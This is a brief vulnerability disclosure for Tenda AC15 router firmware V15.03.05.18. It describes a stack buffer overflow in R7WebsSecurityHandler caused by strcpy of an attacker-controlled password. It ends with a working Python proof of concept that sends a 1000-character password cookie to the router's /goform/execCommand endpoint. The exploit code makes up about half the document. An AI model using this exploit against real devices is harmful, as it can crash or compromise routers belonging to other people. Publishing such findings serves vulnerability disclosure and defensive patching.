- Firmware download website: https://www.tenda.com.cn/download/detail-2710.html
AC15 V15.03.05.18
The Tenda AC15 V15.03.05.18 firmware has a stack overflow vulnerability in the R7WebsSecurityHandler function. The src variable receives the password parameter from a POST request and is later assigned to the v35 variable, which is fixed at 128 bytes. However, since the user can control the input of password, the statement strcpy(v35, src); can cause a buffer overflow. The user-provided password can exceed the capacity of the v35 array, triggering this security vulnerability.
import requests
ip = "192.168.84.101"
url = "http://%s/goform/execCommand"%ip
cookie = {"Cookie":"password=" + "A"*1000}
ret = requests.get(url=url,cookies=cookie)
print(ret.text)